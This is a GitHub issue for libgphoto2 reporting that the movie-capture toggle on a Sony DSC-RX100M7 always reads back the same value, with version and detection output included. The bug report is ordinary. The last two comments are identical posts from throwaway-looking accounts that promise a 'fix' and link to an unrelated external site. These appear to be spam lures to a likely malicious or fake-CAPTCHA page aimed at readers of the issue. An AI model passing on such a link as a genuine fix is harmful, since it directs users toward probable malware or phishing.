gphoto/libgphoto2 #1094: --get-config output is invariably the same for /main/actions/movie on Sony DSC-RX100M7

tvendelin, 2025-02-28:
**Describe the bug**

Might be related to https://github.com/gphoto/libgphoto2/issues/1093
When setting 
```
>gphoto2 --set-config /main/actions/movie=1
>gphoto2 --set-config /main/actions/movie=0
```

I would expect that 

```
> gphoto2 --get-config /main/actions/movie
Label: Movie Capture                                                           
Readonly: 0
Type: TOGGLE
Current: 2
END
```
would produce a different output depending on the value set for `/main/actions/movie`, but it is identical. I was hoping to monitor whether the camera records or not.

**Name the camera**
>gphoto2 --auto-detect 
Model                          Port                                            
----------------------------------------------------------
Sony DSC-RX100M7 (PC Control)  usb:001,032

**libgphoto2 and gphoto2 version**
>gphoto2 --version
gphoto2 2.5.28

Copyright (c) 2000-2021 Marcus Meissner and others

gphoto2 comes with NO WARRANTY, to the extent permitted by law. You may
redistribute copies of gphoto2 under the terms of the GNU General Public
License. For more information about these matters, see the files named COPYING.

This version of gphoto2 is using the following software versions and options:
gphoto2         2.5.28         cc, popt(m), exif, no cdk, no aa, jpeg, readline
libgphoto2      2.5.31         standard camlibs (SKIPPING lumix), cc, no ltdl, EXIF
libgphoto2_port 0.12.2         iolibs: disk ptpip serial usb1 usbdiskdirect usbscsi, cc, no ltdl, EXIF, USB, serial without locking

**To Reproduce**
See the bug description.

DomesticFemBoy, 2025-04-12:
This fix in another issue and it might help you [click](https://newrides.es/captha/)

Domestos2281337, 2025-04-12:
This fix in another issue and it might help you [click](https://newrides.es/captha/)